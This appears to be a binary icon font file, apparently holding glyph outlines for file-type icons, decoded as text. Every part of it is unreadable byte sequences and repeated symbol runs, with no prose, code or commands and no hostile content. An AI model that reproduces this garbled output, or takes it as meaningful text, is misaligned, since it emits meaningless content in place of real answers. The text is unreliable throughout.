 �0       P0 @ @ �8(�(88(�(8`%`&%`& 
`

`
@`�@@�ਨ������!6CLe!2#!"&=463"3!26=4&#!;26=#+"&=#7532+#5732654&##"&=46;5#";5#3 (88(��(88(%& %&��% & 
 
 �`%&@  @

�@

``&%``@�8(�(88(�(8 &�%&�%� &%��

 @@%%`� @

`@
`
 %`&� ����%2;T!2#!"&=463;26=#+"&=#73532654&+732654&##"&=46;5#";5#3 (88(��(88(% & 
 
 � @&%` @

�@

``&%``@�8(�(88(�(8� &%��

 @�`%%@ @

`@
`
 %`&� ����!-8E!2#!"&=463"3!26=4&#!3#53#3#5373#%#5'53753 (88(��(88(%& %&�����`��  V*pp*j @ 00 �8(�(88(�(8 &�%&�%�@ � @ 
V�VVpp````  HH  ����'4"3!26=4&#!3#53#3#5373#%#5'53753(88( (88(�����`��  V*pp*j @ 00 �8(�(88(�(8�@ � @ 
V�VVpp````  HH  @���%-9F!2#!"&=46"3!26=4&##53%3535#53#5##53!'#353735#��(88(� (88(&&�&&� �� @�@  `  �0       �8(�(88(�(8 &�%&�%� ���  @`�``�``�@@��@���)6!2#!"&=46#5#3%3535##5#35335#'#353735#��(88(� (88� ��  @�@`  `  P0       �8(�(88(�(8����  @`�``�``�@@������!Bq�!2#!"&=463"3!26=4&#!+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��& %& & 
 

 
 `&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�%&`%%

`

�%%


&%%


%%%


&%%


%����1`�!2#!"&=463#+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+3";2+"&51#1;2654&+"&546;234&+ (88(��(88(� 
 

 
 & &% &`&% 

 
 % &% 

 
 % �&% 

 
 % &% 

 
 % �8(�(88(�(8�

`

%%`&%�%%


&%%


%%%


&%%


%@���&;ITbm!2#!"&=46"3!26=4&#73#'3;26=#+"&=#!##546;2#'"354&+##546;2#'"354&+��(88(� (88(&&�&&��0 @ @ �`% & 
 
 @` & % @
`
 �` & % @
`
 �8(�(88(�(8 &�%&�%��� &%��

 `�%%��
  
``�%%��
  
@���+9DR]"3!26=4&#73#'33;26=3+"&=!##546;2#'"354&+##546;2#'"354&+�(88(�(88(��0 @ @ �` 
 
 & %@` & % @
`
 �` & % @
`
 �8(�(88(�(8����� 

��%& `�%%��
  
``�%%��
  
����!-6epz!2#!"&=463"3!26=4&#!532+#732654&#7";2+"&51#1;2654&+"&546;234&+;2+5326=4&# (88(��(88(%& %&��`%&@  @

�&% 

 
 % &% 

 
 % �`%&` @

�8(�(88(�(8 &�%&�%�@%%`�@

 %%


&%%


%&`%� �
`
����%T_i!2#!"&=4633532654&+32654&#7";2+"&51#1;2654&+"&546;234&+3326=4&+326=4&# (88(��(88( @&%` @

�&% 

 
 % &% 

 
 % �`&%` @

�8(�(88(�(8��`%% @

 %%


&%%


%�%`& �
`
����!-;F!2#!"&=463"3!26=4&#!#35#535###546;2#'"354&+ (88(��(88(%& %&��` `  ``` & % @
`
 �8(�(88(�(8 &�%&�%`�  �  ``�%%��
  
����*5"3!26=4&#!#53#3#53'##546;2#'"354&+(88( (88(��` `  ` �` & % @
`
 �8(�(88(�(8�  �  @`�%%��
  
����!1:CP\e!2#!"&=463"3!26=4&#!532+732654&#32654&#7'#353735#532+#732654&# (88(��(88(%& %&��`%

&` @

@@

�0       @`%&@  @

�8(�(88(�(8 &�%&�%�x%		%�@

`@

 `�@@��@@%%`�@

���� )2?KT!2#!"&=46332654&'>54&+32654&#32654&#7'#353735#3532654&+32654&# (88(��(88(`&

%` @

@@

�0       @ @&%` @

�8(�(88(�(8�h%		% @

`@

 `�@@��@�`%% @

����!/:D]!2#!"&=463"3!26=4&#!#'#537353%32+5326=4&##"&=46;5#";5#3 (88(��(88(%& %&��P00      ��`%&` @

�@

``&%``@�8(�(88(�(8 &�%&�%��``�@@���&`%� �
`
`@
`
 %`&� ����)3L!2#!"&=46335#'#5#37%326=4&+326=4&##"&=46;5#";5#3 (88(��(88(P      00��`&%` @

�@

``&%``@�8(�(88(�(8���@@��``��%`& �
`
`@
`
 %`&� ����!-:Cr!2#!"&=463"3!26=4&#!3#53#37532+#5732654&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&�� ����`@`%&@  @

�&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�@ � @ @@%%`� @

 %%


&%%


%����)2a!2#!"&=46335#535#35#73532654&+732654&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88( ``����� @&%` @

�&% 

 
 % &% 

 
 % �8(�(88(�(8� @ � ��`%%@ @

 %%


&%%


%����'3=G!2#!"&=46"3!26=4&#3535#3#35#535#535#35353535#3535��(88(�`(88(&%�&%�� @�� `  `��� ``�� `�8(�(88(�(8 &�%&�%`��  �  �  @@ �` @ �` ����#-7!2#!"&=463535#3#35#535#535#35353535#3535��(88(�`(88h @�� `  `��� ``�� `�8(�(88(�(8���  �  �  @@ �` @ �` ����!1BJy!2#!"&=463"3!26=4&#!32+"&=46";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@ %& %&

 

 � @�&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%@&`%&`% 
`

`
��   %%


&%%


%���� 19h!2#!"&=463";26=4&#";26=4&+33535#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(@&% &% 

 

 � @�&% 

 
 % &% 

 
 % �8(�(88(�(8`%`&%`& 
`

`
��   %%


&%%


%����!-6BNW!2#!"&=463"3!26=4&#!532+#732654&#53#5##537532+#732654&# (88(��(88(%& %&��`%&@  @

�  `  �`%&@  @

�8(�(88(�(8 &�%&�%�@%%`�@

@`�``�` @%%`�@

����%1=F!2#!"&=4633532654&+32654&##5#35335#3532654&+32654&# (88(��(88( @&%` @

�`  `  @ @&%` @

�8(�(88(�(8��`%% @

@`�``�@�`%% @

����!-6C!2#!"&=463"3!26=4&#!532+#732654&##5'53753 (88(��(88(%& %&��``%&@  @

� @ 00 �8(�(88(�(8 &�%&�%�@%%`�@

````  HH  ����%2!2#!"&=4633532654&+32654&#75#'5#3 (88(��(88(` @&%` @

�@ 00 @ �8(�(88(�(8��`%% @

``  HH  ``����!B!2#!"&=463"3!26=4&#!+"&=46;2#4&+";2653 (88(��(88(%& %&��`& %& & 
 

 
 �8(�(88(�(8 &�%&�%�%&`%%

`

����1"3!26=4&#!+"&=46;2#4&+";2653(88( (88(��`& %& & 
 

 
 �8(�(88(�(8�%&`%%

`

����*;Lz�7'>=4&+";267'#"&=46;2'!2#!"&=463"3!26=4&#!";2+"&51#1;2654&+"&546;234&##536% &% 

 
,"�� (88(��(88(%& %&��@&% 

 
 % &% 

 
 %�� D	`&%`&
`

`
," 8(�(88(�(8 &�%&�%@%%


&%%


%� �����*;io+"&=46;2''#"&=46;2'"3!26=4&#!32#4&+";2+"&5131;2654&+"&546#536 %& %

 
,"��(88( (88(��@ % 
 

 %& % 
 

 %&�� D&`%&`	
`

`
," 8(�(88(�(8`%


%%&


%%� �����!/8HQZ!2#!"&=463"3!26=4&#!##532##'32654&#532+732654&#32654&# (88(��(88(%& %&�� `%%@&Z@

``%

&` @

@@

�8(�(88(�(8 &�%&�%�`�%%`�@

Xx%		%�@

`@

����'7@I"3!26=4&#!##532##'32654&#532+732654&#32654&#(88( (88(�� `%%@&Z@

``%

&` @

@@

�8(�(88(�(8�`�%%`�@

Xx%		%�@

`@

����!BOXdm!2#!"&=463"3!26=4&#!+"&=46;2#4&+";26537532+#5732654&#532+#732654&# (88(��(88(%& %&��& %& & 
 

 
  `%&@  @

``%&@  @

�8(�(88(�(8 &�%&�%�%&`%%

`

`@%%`� @

 @%%`�@

����1>GS\!2#!"&=463#+"&=46;234&+";26573532654&+732654&#3532654&+32654&# (88(��(88(� 
 

 
 & &% &  @&%` @

` @&%` @

�8(�(88(�(8�

`

%%`&%`�`%%@ @

 �`%% @

����!)BP[!2#!"&=463"3!26=4&#!3535##"&=46;5#";5#33##546;2#'"354&+ (88(��(88(%& %&��@ @�@@

``&%``@�` & % @
`
 �8(�(88(�(8 &�%&�%`��  `@
`
 %`&� `�%%��
  
����1?J!2#!"&=4633535##"&=46;5#";5#33354&+"357"354&+ (88(��(88(@ @�@@

``&%``@� % &  
`
 �8(�(88(�(8���  `@
`
 %`&� `�%%�``
  
����!-8BL!2#!"&=463"3!26=4&#!'373#'#'32+5326=4&#535#3535 (88(��(88(%& %&��@ 00 @@ 00 �`%&` @

@�� `�8(�(88(�(8 &�%&�%�pTTppTT�&`%� �
`
@@ �` ����'1;!2#!"&=463373'7#'##326=4&+326=4&#535#3535 (88(��(88(@ 00 @@ 00 �`&%` @

@�� `�8(�(88(�(8�pTTppTT�%`& �
`
@@ �` ����!,6GXy!2#!"&=463"3!26=4&#!32+5326=4&#732+"&=463";26=4&++"&=46;2#4&+";2653 (88(��(88(%& %&��`%&` @

� %& %&

 

  & %& & 
 

 
 �8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

����%6Gh!2#!"&=463326=4&+326=4&#7";26=4&+";26=4&+#+"&=46;234&+";265 (88(��(88(`&%` @

�&% &% 

 

   
 

 
 & &% &�8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%����!1BMW_!2#!"&=463"3!26=4&#!32+"&=46";26=4&+732+5326=4&#33535# (88(��(88(%& %&��@ %& %&

 

 �`%&` @

� @��8(�(88(�(8 &�%&�%@&`%&`% 
`

`
 &`%� �
`
��  ���� 1<FN!2#!"&=463";26=4&#";26=4&+7326=4&+326=4&#33535# (88(��(88(@&% &% 

 

 �`&%` @

� @��8(�(88(�(8`%`&%`& 
`

`
 �%`& �
`
��  ����!-3b!2#!"&=463"3!26=4&#!'373#'#%#537";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@@ 00 @@ 00 `� �&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�pTTppTT  �%%


&%%


%����"P"3!26=4&#!'373#'#%#53732#4&+";2+"&5131;2654&+"&546(88( (88(��@@ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�8(�(88(�(8�pTTppTT  �%


%%&


%%@���*4DUv�!2#!"&=46"3!26=4&#32+5326=4&#732+"&=46";26=4&++"&=46;2#4&+";26537'373#'#��(88(� (88(&&�&&� `%&` @

� %& %&

 

  & %& & 
 

 
 `@ 00 @@ 00 �8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
�%&`%%

`

0pTTppTT@���$4Efr!2#!"&=46326=4&+326=4&#7";26=4&#";26=4&+#+"&=46;234&+";2657373'7#'#��(88(� (88(`&%` @

�&% &% 

 

   
 

 
 & &% &`@ 00 @@ 00 �8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
�

`

%%`&%0pTTppTT����!.7CLT!2#!"&=463"3!26=4&#!532+#5732654&#532+#732654&#!3535# (88(��(88(%& %&��`%&@  @

��`%&@  @

` @��8(�(88(�(8 &�%&�%�@%%`� @

 @%%`�@

��  ����&2;C!2#!"&=4633532654&+732654&#3532654&+32654&#!3535# (88(��(88(� @&%` @

�� @&%` @

` @��8(�(88(�(8��`%%@ @

 �`%% @

��  ����!/:iu~!2#!"&=463"3!26=4&#!##546;2#'"354&+7";2+"&51#1;2654&+"&546;234&+532+#732654&# (88(��(88(%& %&��` & % @
`
 �&% 

 
 % &% 

 
 % �`%&@  @

�8(�(88(�(8 &�%&�%�`�%%��
  
 %%


&%%


%@@%%`�@

����)Xdm!2#!"&=463354&+"357"354&+7";2+"&51#1;2654&+"&546;234&+3532654&+32654&# (88(��(88(� % &  
`
 �&% 

 
 % &% 

 
 % � @&%` @

�8(�(88(�(8�`�%%�``
  
 %%


&%%


%@�`%% @

����!-N}!2#!"&=463"3!26=4&#!#35#535#+"&=46;2#4&+";26537";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@ `  ` & %& & 
 

 
 `&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%`�  �  �%&`%%

`

�%%


&%%


%����=l!2#!"&=463#35#535##+"&=46;234&+";2657";2+"&51#1;2654&+"&546;234&+ (88(��(88(@ `  `  
 

 
 & &% &`&% 

 
 % &% 

 
 % �8(�(88(�(8��  �  �

`

%%`&%�%%


&%%


%����!/:EOW!2#!"&=463"3!26=4&#!##546;2#'"354&+%32+5326=4&#!3535# (88(��(88(%& %&��@` & % @
`
 �`%&` @

` @��8(�(88(�(8 &�%&�%�`�%%��
  
 &`%� �
`
��  ����)4>F!2#!"&=463354&+"357"354&+%326=4&+326=4&#!3535# (88(��(88(@ % &  
`
 �`&%` @

` @��8(�(88(�(8�`�%%�``
  
 �%`& �
`
��  ����!-:@!2#!"&=463"3!26=4&#!'373#'#%'#353735##53 (88(��(88(%& %&��@@ 00 @@ 00 0       � �8(�(88(�(8 &�%&�%�pTTppTT�`�@@�� �����)/"3!26=4&#!'373#'#%73#5#'#53#53(88( (88(��@@ 00 @@ 00 0       @� �8(�(88(�(8�pTTppTT�`�@@�� �����!.;A!2#!"&=463"3!26=4&#!#5'53753'#353735##53 (88(��(88(%& %&��` @ 00 p0       � �8(�(88(�(8 &�%&�%�```  HH  @`�@@�� �����*0"3!26=4&#!#5'5375373#5#'#53#53(88( (88(��` @ 00 p0       @� �8(�(88(�(8�```  HH  @`�@@�� �����!-!2#!"&=463"3!26=4&#!53#5##53 (88(��(88(%& %&��@  `  �8(�(88(�(8 &�%&�%�`�``�`����"3!26=4&#!53#5##53(88( (88(��@  `  �8(�(88(�(8�`�``�`����!-9E!2#!"&=463"3!26=4&#!3#53#37'373#'#73#53#3 (88(��(88(%& %&�� ����`�@ 00 @@ 00 ���`�8(�(88(�(8 &�%&�%�@ � @ pTTppTT`@ � @ ����(4"3!26=4&#!3#53#37'373#'#73#53#3(88( (88(�� ����`�@ 00 @@ 00 ���`�8(�(88(�(8�@ � @ pTTppTT`@ � @ ��`�!/:AM!2#!"&=463"3!26=4&#!##546;2#'"354&+73#'3#35#535#� (88(��(88(%& %&��` & % @
`
 �0 @ @ � `  `�8(�(88(�(8 &�%&�%�`�%%��
  
���� �  �  ��`�)0<"3!26=4&#!##546;2#'"354&+73#'3#53#3#53�(88( (88(��` & % @
`
 �0 @ @ � `  ` �8(�(88(�(8�`�%%��
  
����   �  ����!,6BK[l!2#!"&=463"3!26=4&#!32+5326=4&#532+#732654&#%32+"&=46";26=4&+ (88(��(88(%& %&��`%&` @

``%&@  @

�` %& %&

 

 �8(�(88(�(8 &�%&�%@&`%� �
`
 @%%`�@

 &`%&`% 
`

`
����%1:J[!2#!"&=463326=4&+326=4&#3532654&+32654&#%";26=4&#";26=4&+ (88(��(88(�`&%` @

` @&%` @

�`&% &% 

 

 �8(�(88(�(8`�%`& �
`
 �`%% @

 %`&%`& 
`

`
@���*4DU]i!2#!"&=46"3!26=4&#32+5326=4&#732+"&=46";26=4&+33535#'373#'#��(88(� (88(&&�&&� `%&` @

� %& %&

 

 � @�@ 00 @@ 00 �8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
��  PpTTppTT@���$4EMY!2#!"&=46326=4&+326=4&#7";26=4&#";26=4&+33535#373'7#'#��(88(� (88(`&%` @

�&% &% 

 

 � @�@ 00 @@ 00 �8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
��  PpTTppTT@���+1`l!2#!"&=46"3!26=4&#'373#'#%#537";2+"&51#1;2654&+"&546;234&+'373#'#��(88(� (88(&&�&&�`@ 00 @@ 00 `� �&% 

 
 % &% 

 
 % �@ 00 @@ 00 �8(�(88(�(8 &�%&�%�pTTppTT  �%%


&%%


%ppTTppTT@���!O["3!26=4&#'373#'#%#53732#4&+";2+"&5131;2654&+"&546'373#'#�(88(�(88(�`@ 00 @@ 00 `� � % 
 

 %& % 
 

 %&�@ 00 @@ 00 �8(�(88(�(8�pTTppTT  �%


%%&


%%ppTTppTT����!1BMW�!2#!"&=463"3!26=4&#!32+"&=46";26=4&+732+5326=4&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��@ %& %&

 

 �`%&` @

�&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%@&`%&`% 
`

`
 &`%� �
`
 %%


&%%


%���� 1<Fu!2#!"&=463";26=4&#";26=4&+7326=4&+326=4&#7";2+"&51#1;2654&+"&546;234&+ (88(��(88(@&% &% 

 

 �`&%` @

�&% 

 
 % &% 

 
 % �8(�(88(�(8`%`&%`& 
`

`
 �%`& �
`
 %%


&%%


%����!.7CL{!2#!"&=463"3!26=4&#!532+#5732654&#532+#732654&#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(%& %&��`%&@  @

��`%&@  @

`&% 

 
 % &% 

 
 % �8(�(88(�(8 &�%&�%�@%%`� @

 @%%`�@

 %%


&%%


%����&2;j!2#!"&=4633532654&+732654&#3532654&+32654&#%";2+"&51#1;2654&+"&546;234&+ (88(��(88(� @&%` @

�� @&%` @

`&% 

 
 % &% 

 
 % �8(�(88(�(8��`%%@ @

 �`%% @

 %%


&%%


%����!,6GX`!2#!"&=463"3!26=4&#!32+5326=4&#732+"&=463";26=4&+33535# (88(��(88(%& %&��`%&` @

� %& %&

 

 � @��8(�(88(�(8 &�%&�%@&`%� �
`
 &`%&`% 
`

`
��  ����%6GO!2#!"&=463326=4&+326=4&#7";26=4&+";26=4&+33535# (88(��(88(`&%` @

�&% &% 

 

 � @��8(�(88(�(8`�%`& �
`
 %`&%`& 
`

`
��  ����!)5=!2#!"&=463"3!26=4&#!3535#'373#'#%3535# (88(��(88(%& %&��@ @�@ 00 @@ 00  @��8(�(88(�(8 &�%&�%`��  PpTTppTT���  ����$,!2#!"&=4633535#373'7#'#3535# (88(��(88(@ @�@ 00 @@ 00  @��8(�(88(�(8���  PpTTppTT ��  ����!/8@J!2#!"&=463"3!26=4&#!##532##'32654&#33535#535#3535 (88(��(88(%& %&��: `%%@&Z@

� @�� `�8(�(88(�(8 &�%&�%�`�%%`�@

��  @@ �` ����'/9!2#!"&=4633'2654&+35532654&#33535#535#3535 (88(��(88(:@&@%%` @

� @�� `�8(�(88(�(8�``%%�``@

��  @@ �` ����!.1<C!2#!"&=463"3!26=4&#!'#353735##73535#5#73#'3 (88(��(88(%& %&��P0       �::    `0 @ @ �8(�(88(�(8 &�%&�%�`�@@��Pp@@ �� ������� +2!2#!"&=463'#353735#53535#5#'#37# (88(��(88(P0       �::    `0 @ @ �8(�(88(�(8�`�@@��PP @@ �� �������!+18!2#!"&=463"3!26=4&#!535#3535#53?3#'3 (88(��(88(%& %&�� �� `� �0 @ @ �8(�(88(�(8 &�%&�%�@ �` ` �������� '"3!26=4&#!3##53##53?3#'3(88( (88(�� `` ��@� �0 @ @ �8(�(88(�(8� `� � ��������!.;D]!2#!"&=463"3!26=4&#!'#353735#532+#5732654&##"&=46;5#";5#3 (88(��(88(%& %&��P0       @`%&@  @

�@

``&%``@�8(�(88(�(8 &�%&�%�`�@@��@@%%`� @

`@
`
 %`&� ����*3L!2#!"&=463'#353735#3532654&+732654&##"&=46;5#";5#3 (88(��(88(P0       @ @&%` @

�@

``&%``@�8(�(88(�(8�`�@@��@�`%%@ @

`@
`
 %`&� ����*;LT7'>=4&+";267'#"&=46;2'!2#!"&=463"3!26=4&#!3535#�% &% 

 
,"� (88(��(88(%& %&��` @�D	`&%`&
`

`
," 8(�(88(�(8 &�%&�%`��  ����*;C+"&=46;2''#"&=46;2'"3!26=4&#!#53##� %& %

 
,"�(88( (88(��`@�@ D&`%&`	
`

`
," 8(�(88(�(8�  �����!.:EO!2#!"&=463"3!26=4&#!'#353735##35#535#732+5326=4&# (88(��(88(%& %&��p0       ` `  `�`%&` @

�8(�(88(�(8 &�%&�%�`�@@�� �  �   &`%� �
`
����)4>!2#!"&=463'#353735##35#535#7326=4&+326=4&# (88(��(88(p0       ` `  `�`&%` @

�8(�(88(�(8�`�@@�� �  �   �%`& �
`
����!Ngs|!2#!"&=463"3!26=4&#!46;2+"&53;2654&+532654&+"#"&=46;5#";5#37532+#732654&# (88(��(88(%& %&��& %

& % 
 

  

 
 @

``&%``@@`%&@  @

�8(�(88(�(8 &�%&�%�%%		%%


 


@@
`
 %`&� @@%%`�@

����>Wcl!2#!"&=463346;2+32+"&5#;2654&'>54&+"#"&=46;5#";5#373532654&+32654&# (88(��(88( 
 

  

 
 % &

% &@@

``&%``@@ @&%` @

�8(�(88(�(8�


 


%%		%%@@
`
 %`&� @�`%% @

`���-8DNX!2#!"&=46"3!26=4&###546;2#'"354&+3#35#535#535#35353535#3535��(88(�`(88(&%�&%��` & % @
`
 � `  `��� ``�� `�8(�(88(�(8 &�%&�%�`�%%��
  
�  �  @@ �` @ �` `���(4>H!2#!"&=46354&+"357"354&+3#35#535#535#35353535#3535��(88(�`(88� % &  
`
 � `  `��� ``�� `�8(�(88(�(8�`�%%�``
  
�  �  @@ �` @ �` ����!/:HSt!2#!"&=463"3!26=4&#!##546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653 (88(��(88(%& %&��` & % @
`
 ` & % @
`
  & %& & 
 

 
 �8(�(88(�(8 &�%&�%�`�%%��
  
``�%%��
  
�%&`%%

`

����)7Bc"3!26=4&#!##546;2#'"354&+##546;2#'"354&++"&=46;2#4&+";2653(88( (88(��` & % @
`
 ` & % @
`
  & %& & 
 

 
 �8(�(88(�(8�`�%%��
  
``�%%��
  
�%&`%%

`

����!/=HO!2#!"&=463"3!26=4&#!#'#5373537##546;2#'"354&+73#'3 (88(��(88(%& %&��00      �` & % @
`
 �0 @ @ �8(�(88(�(8 &�%&�%��``�@@��``�%%��
  
��������,7>"3!26=4&#!#'#5373537##546;2#'"354&+73#'3(88( (88(��00      �` & % @
`
 �0 @ @ �8(�(88(�(8��``�@@��``�%%��
  
��������!+7CL!2#!"&=463"3!26=4&#!75#3357#35#535#532+#732654&# (88(��(88(%& %&��@�����@ `  `�`%&@  @

�8(�(88(�(8 &�%&�%��  �  ��  �   @%%`�@

����&2;!2#!"&=46375#3357#35#535#3532654&+32654&# (88(��(88(@�����@ `  `� @&%` @

�8(�(88(�(8��  �  ��  �   �`%% @

����!1BJR!2#!"&=463"3!26=4&#!32+"&=46";26=4&+33535#!3535# (88(��(88(%& %&��@ %& %&

 

 � @� @��8(�(88(�(8 &�%&�%@&`%&`% 
`

`
��  ��  ���� 19A!2#!"&=463";26=4&#";26=4&+33535#!3535# (88(��(88(@&% &% 

 

 � @� @��8(�(88(�(8`%`&%`& 
`

`
��  ��  ����!)BL!2#!"&=463"3!26=4&#!3535##"&=46;5#";5#375#335 (88(��(88(%& %&��@ @�@@

``&%``@`������8(�(88(�(8 &�%&�%`��  `@
`
 %`&� @�  �  ����1;!2#!"&=4633535##"&=46;5#";5#375#335 (88(��(88(@ @�@@

``&%``@`������8(�(88(�(8���  `@
`
 %`&� @�  �  ����!,6C\!2#!"&=463"3!26=4&#!32+5326=4&#'#353735##"&=46;5#";5#3 (88(��(88(%& %&��`%&` @

�0       �@

``&%``@�8(�(88(�(8 &�%&�%@&`%� �
`
@`�@@��@
`
 %`&� ����%2K!2#!"&=463326=4&+326=4&#'#353735##"&=46;5#";5#3 (88(��(88(`&%` @

�0       �@

``&%``@�8(�(88(�(8`�%`& �
`
@`�@@��@
`
 %`&� ����!-[k|!2#!"&=463"3!26=4&#!#35#535#7";2+"&51#1;2654&+"&546;234&#;2+"&=46";26=4&+ (88(��(88(%& %&��@ `  `�&% 

 
 % &% 

 
 %� %& %&

 

 �8(�(88(�(8 &�%&�%`�  �   %%


&%%


%&`%&`% 
`

`
����J[l!2#!"&=463#35#535#7";2+"&51#1;2654&+"&546;234&#3";26=4&+";26=4&+ (88(��(88(@ `  `�&% 

 
 % &% 

 
 %�&% &% 

 

 �8(�(88(�(8��  �   %%


&%%


%%`&%`& 
`

`
����!/8FQ_h!2#!"&=463"3!26=4&#!##532##'32654&###546;2#'"354&+##532##'32654&# (88(��(88(%& %&��: `%%@&Z@

�` & % @
`
 � `%%@&Z@

�8(�(88(�(8 &�%&�%�`�%%`�@

``�%%��
  
``�%%`�@

����'5@NW"3!26=4&#!##532##'32654&###546;2#'"354&+##532##'32654&#(88( (88(��: `%%@&Z@

�` & % @
`
 � `%%@&Z@

�8(�(88(�(8�`�%%`�@

``�%%��
  
``�%%`�@

����!:FP!2#!"&=463"3!26=4&#!#"&=46;5#";5#37#35#535#535#3535 (88(��(88(%& %&��@

``&%``@` `  `��� `�8(�(88(�(8 &�%&�%�@
`
 %`&� `�  �  @@ �` ����)5?!2#!"&=463#"&=46;5#";5#37#35#535#535#3535 (88(��(88(�@

``&%``@` `  `��� `�8(�(88(�(8�@
`
 %`&� `�  �  @@ �` @`	+Dahx#5353#73+"&=3;26='#353735#'5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46�  `  � & % 
 
�0       ��&%�%(88(� 
� 

@%��(88(��v
` &%��&%��ࠠ��%&��

�``�@@��``�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@�`"2<Q^%#!"&5463!;!"3!;"3!26=4&##5353#73+"&=3;26=73#5#'#53�%� %&@&���(88( �
���%& %&�  `  � & % 
 
�0       �@%&�&�%@8(�(8�
�&�%&�%��ࠠ��%&��

�``�@@��@`$AHXa��3532654&+%5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=463!2#!"&5732+%";2+"&51#1;2654&+"&546;234&+#"&=46;5#";5#3� @&%` ���&%�%(88(� 
� 

@%��(88(��v
�% &%��&`@

@�&% 

 
 % &% 

 
 % �@

``&%``@��`%%``�&� &%@8(�(8�`@

�
�%@8(�(8��
���&%�&%�

`%%


&%%


%�@
`
 %`&� @�`"2KW`�%#!"&5463!;!"3!;!2#!"&=46#"&=46;5#";5#3%3532654&+32654&#%";2+"&51#1;2654&+"&546;234&+�%� %&@&���(88( �
��� &%��&%[@

``&%``@�� @&%` @

`&% 

 
 % &% 

 
 % �@%&�&�%@8(�(8�
�%�&%�&�@
`
 %`&� @�`%% @

 %%


&%%


%
@`5<LZeqz��5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46##546;2#'"354&+532+#732654&#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�` & % @
`
 �`%&@  @

``%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�%%��
  
 @%%`�@

 @%%`�@

	@�`"2@KW`lu%#!"&5463!;!"3!;!2#!"&=46354&+"357"354&+3532654&+32654&#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%� % &  
`
 � @&%` @

` @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�`�%%�``
  
 �`%% @

 �`%% @

@`5<LXak�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46532+#732654&##5353#7#"&=46;5#";5#3����&%�%(88(� 
� 

@%��(88(��v
` &%��&%`%&@  @

�  `  �@

``&%``@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@%%`�@

 �ࠠ�`@
`
 %`&� @�`"2>GQj%#!"&5463!;!"3!;!2#!"&=463532654&+32654&#35#'#3%#"&=46;5#";5#3�%� %&@&���(88( �
��� &%��&% @&%` @

�`  `   @

``&%``@�@%&�&�%@8(�(8�
�%�&%�&��`%% @

 �ࠠ�`@
`
 %`&� 	@`5<LVbkv�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46535#3535%532+#732654&#732+5326=4&+����&%�%(88(� 
� 

@%��(88(��v
` &%��&%��� `�`%&@  @

``%&` @

@ `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�@ �`  @%%`�@

 &`%� �
`
@�`"2<HQ\g%#!"&5463!;!"3!;!2#!"&=46535#3535%3532654&+32654&#7326=4&+326=4&+�%� %&@&���(88( �
��� &%��&%��� `� @&%` @

``&%` @

@�@%&�&�%@8(�(8�
�%�&%�&�@ �`  �`%% @

 �%`& �
`
@`5<LY���5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46'#353735#46;2+"&53;2654&+532654&+"#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%k0       & %

& % 
 

  

 
�`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�`�@@��@%%		%%


 


@%%`�@

@�`"2?lx�%#!"&5463!;!"3!;!2#!"&=46'#353735#346;2+32+"&5#;2654&'>54&+"3532654&+32654&#�%� %&@&���(88( �
��� &%��&%k0        
 

  

 
 % &

% &� @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�`�@@��@


 


%%		%%�`%% @

	@`5<LOZgs|5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=46#73535#5#%'#353735#532+#732654&#����&%�%(88(� 
� 

@%��(88(��v
` &%��&%�::    `��0       @`%&@  @

 `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&�Pp@@ �� @`�@@��@@%%`�@

@�`"25@MYb%#!"&5463!;!"3!;!2#!"&=4653535#5#%'#353735#3532654&+32654&#�%� %&@&���(88( �
��� &%��&%�::    `��0       @ @&%` @

�@%&�&�%@8(�(8�
�%�&%�&�PP @@ �� @`�@@��@�`%% @

@`5<L\mz�5'!"3!26=!26=4&#!#!"&5463!;!"3!#"&=!2#!"&=4632+"&=46";26=4&+'#353735#73#'3����&%�%(88(� 
� 

@%��(88(��v
` &%��&% %& %&

 

 �0       P0 @ @  `�&� &%@8(�(8�`@

�
�%@8(�(8��
���%�&%�&@&`%&`% 
`

`
